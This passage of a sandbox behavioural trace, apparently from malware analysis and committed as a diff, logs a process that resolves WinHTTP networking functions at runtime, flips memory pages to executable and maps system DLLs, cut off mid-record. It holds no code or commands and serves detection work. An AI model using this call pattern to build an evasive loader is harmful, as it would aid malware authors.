"9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpReceiveResponse" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72d93720" + } + ], + "repeated": 0, + "id": 265 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpQueryDataAvailable" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72da8ed0" + } + ], + "repeated": 0, + "id": 266 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpConnect" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72da7830" + } + ], + "repeated": 0, + "id": 267 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpReadData" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72db87e0" + } + ], + "repeated": 0, + "id": 268 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022901ca", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "USER32.dll" + }, + { + "name": "BaseAddress", + "value": "0x76b60000" + } + ], + "repeated": 0, + "id": 269 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "USER32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76b60000" + }, + { + "name": "FunctionName", + "value": "wsprintfA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76b88b90" + } + ], + "repeated": 0, + "id": 270 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "USER32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76b60000" + }, + { + "name": "FunctionName", + "value": "wsprintfW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76b87b70" + } + ], + "repeated": 0, + "id": 271 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022903ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02431000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000020", + "pretty_value": "PAGE_EXECUTE_READ" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 272 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022903ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02432000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 273 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022903ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02433000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00020000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 274 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022903ac", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02434000" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 275 + }, + { + "timestamp": "2025-03-07 21:41:19,124", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "GetSystemTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 276 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "windows.storage.dll" + } + ], + "repeated": 0, + "id": 277 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\windows.storage.dll" + } + ], + "repeated": 0, + "id": 278 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002d0" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\windows.storage.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 279 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002d4" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000002d0" + } + ], + "repeated": 0, + "id": 280 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002d4" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74880000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x0060d000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 281 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00002000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 282 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 283 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 284 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e1f000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 285 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "Wldp.dll" + } + ], + "repeated": 0, + "id": 286 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002d4" + } + ], + "repeated": 0, + "id": 287 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002d0" + } + ], + "repeated": 0, + "id": 288 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\Wldp.dll" + } + ], + "repeated": 0, + "id": 289 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wldp.dll" + } + ], + "repeated": 0, + "id": 290 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002d0" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wldp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 291 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002d4" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000002d0" + } + ], + "repeated": 0, + "id": 292 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000002d4" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74850000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00025000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 293 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74870000" + }, + { + "name": "ModuleName", + "value": "Wldp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 294 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 295 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 296 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7486e000" + }, + { + "name": "ModuleName", + "value": "Wldp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 297 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002d4" + } + ], + "repeated": 0, + "id": 298 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002d0" + } + ], + "repeated": 0, + "id": 299 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e1f000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 300 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtSetInformationProcess", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessInformationClass", + "value": "35" + }, + { + "name": "ProcessInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\n\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\\x00p\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\\x00A\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00a\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00p\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 301 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7486e000" + }, + { + "name": "ModuleName", + "value": "Wldp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 302 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 303 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 304 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 305 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\Wldp.dll" + } + ], + "repeated": 0, + "id": 306 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\wldp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 307 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002d0" + } + ], + "repeated": 0, + "id": 308 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\Wldp" + }, + { + "name": "DllBase", + "value": "0x74850000" + } + ], + "repeated": 0, + "id": 309 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 310 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 311 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 312 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\windows.storage.dll" + } + ], + "repeated": 0, + "id": 313 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000002d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\windows.storage.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 314 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000002d0" + } + ], + "repeated": 0, + "id": 315 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\windows.storage" + }, + { + "name": "DllBase", + "value": "0x74880000" + } + ], + "repeated": 0, + "id": 316 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "api-ms-win-eventing-provider-l1-1-0.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + } + ], + "repeated": 0, + "id": 317 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, 